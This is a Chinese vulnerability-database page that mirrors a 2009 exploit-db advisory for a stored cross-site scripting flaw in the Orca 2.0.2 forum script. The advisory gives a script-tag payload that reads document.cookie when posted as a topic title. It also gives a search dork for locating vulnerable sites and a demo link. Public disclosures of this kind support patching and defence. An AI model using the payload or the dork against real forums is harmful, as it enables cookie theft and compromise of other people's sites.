Orca 2.0.2 - 'topic ' Cross-Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057392 漏洞类型
发布时间 2009-01-30 更新时间 2009-01-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7931
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
--------------------------------------------------------------------------\
[+]  Script : Orca-v.2.0.2
[+]  Bug: Xss
[+]  By: J-Hacker || Jerusalem Hacker || From : soqor.net
[+]  Email : M0t4z@hotmail.com
[+]  Download : http://www.boonex.com/thankyou.php?p=Orca-v.2.0
[+]  D0rk :Powered by Orca Interactive Forum Script. Copyright 2008 My Company
--------------------------------------------------------------------------
First you must login then write new topic
write in the topic
 "><script>alert(document.cookie)</script>
demo: http://www.demozzz.com/orca/demo/?action=goto&topic_id=test--2009-01-30#topic/-script-alert-document-cookie-script-.htm
--------------------------------------------------------------------------
[+] Greetz : HACKERS PAL , Sp1d3r_Net , Mr.5rab , Dr.CriMiNAL SyRiA , And All soqor.net members
[+] http://WwW.SoQoR.NeT
--------------------------------------------------------------------------/

# milw0rm.com [2009-01-30]